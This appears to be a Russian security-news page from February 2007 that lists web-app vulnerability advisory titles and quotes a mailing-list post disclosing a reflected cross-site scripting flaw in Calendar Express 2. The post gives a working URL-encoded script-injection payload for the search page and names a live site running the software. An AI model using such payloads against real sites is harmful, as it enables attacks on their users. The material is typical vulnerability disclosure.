Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability

CodeAvalanche News SQL Injection

nabopoll 1.2 Remote Unprotected Admin Section Vulnerability

nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability

From:	bl4ck_(at)_bsdmail.org <bl4ck_(at)_bsdmail.org>
Date:	15 февраля 2007 г.
Subject:	XSS in [Calendar Express 2 ]

hey guys .. check out this new xss i just found  ;P

Vulnerable : Calendar Express 2
web : http://www.ci.emeryville.ca.us/calendar, http://www.phplite.com/products/calendarexpress/


XSS :

http://127.0.0.1/calendar/search.
php?allwords=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%
29%3C%2Fscript%3E&cid=1&title=1&desc=1


################################
Discovered  By BLacK ZeRo
K.S.A
bL4ck@bsdmail.org
################################

Best regards ,,